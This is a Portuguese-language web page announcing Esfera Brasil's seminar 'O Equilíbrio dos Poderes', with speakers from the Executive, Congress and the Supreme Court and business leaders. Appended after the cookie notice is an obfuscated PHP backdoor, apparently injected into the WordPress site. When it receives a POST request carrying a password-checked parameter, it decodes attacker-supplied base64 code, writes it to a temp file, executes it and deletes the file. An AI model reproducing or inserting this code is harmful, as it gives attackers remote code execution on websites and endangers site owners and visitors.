Seminário sobre os Três Poderes

INSCREVA-SE AQUI

Com a proximidade das eleições, a questão da segurança jurídica institucional tem pautado o debate. Incertezas no equilíbrio entre os Poderes e imprevisibilidade na aplicação das leis e marcos regulatórios ampliam os riscos nos ambientes de negócios, prejudicando a competitividade e os investimentos.

Pesquisa Datafolha realizada com 3.667 pessoas em setembro de 2021 apontou que aumentou a desconfiança do brasileiro acerca de Executivo, Legislativo e Judiciário, além de outros atores institucionais, como o Ministério Público, em comparação a julho de 2019. A falta de confiança no Executivo passou de 31% para 50%, no Congresso, de 45% para 49%, e no Judiciário, de 26% para 31%.

Para analisar a relação entre os Três Poderes no contexto político atual e pensar soluções para que o País retome seu crescimento e melhore o ambiente de negócios, a Esfera Brasil realizará no próximo dia 19 o seminário “O Equilíbrio dos Poderes”.

O evento contará com a participação do ministro da Casa Civil, Ciro Nogueira (PP), dos presidentes do Senado e da Câmara, Rodrigo Pacheco (PSD) e Arthur Lira (PP), e do ministro Dias Toffoli, do Supremo Tribunal Federal, para discutir a relação entre Executivo, Legislativo e Judiciário. A mediação do debate será feita por Marcello D’Angelo, diretor de Relações Institucionais da Band em Brasília.

Já o painel “Os motores do Brasil e a segurança institucional” contará com a participação de Isaac Sidney, presidente da Febraban (Federação Brasileira de Bancos), Luis Henrique Guimarães, presidente da Abrasca (Associação Brasileira das Companhias Abertas), e Robson Braga de Andrade, presidente da CNI (Confederação Nacional das Indústrias). A mediação ficará a cargo de Renata Gil, presidente da Associação dos Magistrados Brasileiros.

“Este será o seminário mais importante do ano para nós. Pela primeira vez no atual governo vamos reunir as principais lideranças dos Três Poderes para mostrar a força institucional que o nosso país tem. Estamos dialogando em prol do Brasil”, afirma João Carlos Camargo, CEO da Esfera Brasil.

“A gente precisa de instituições fortes, de instituições democráticas livres e independentes, mas que também dialoguem com a sociedade. E é isso que a Esfera pretende fazer no dia 19 de agosto”, afirma a advogada Gabriela Araújo, integrante do conselho da Esfera Brasil.

O seminário, que acontecerá em São Paulo, terá transmissão ao vivo pelo nosso canal no YouTube a partir das 10h do dia 19. Para acompanhar, é necessário fazer a inscrição através deste link: Seminário O Equilíbrio dos Poderes.

O evento tem o apoio da Abrasca, da CNI e da Febraban.

Vamos juntos pensar em novos caminhos para o desenvolvimento do Brasil!

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}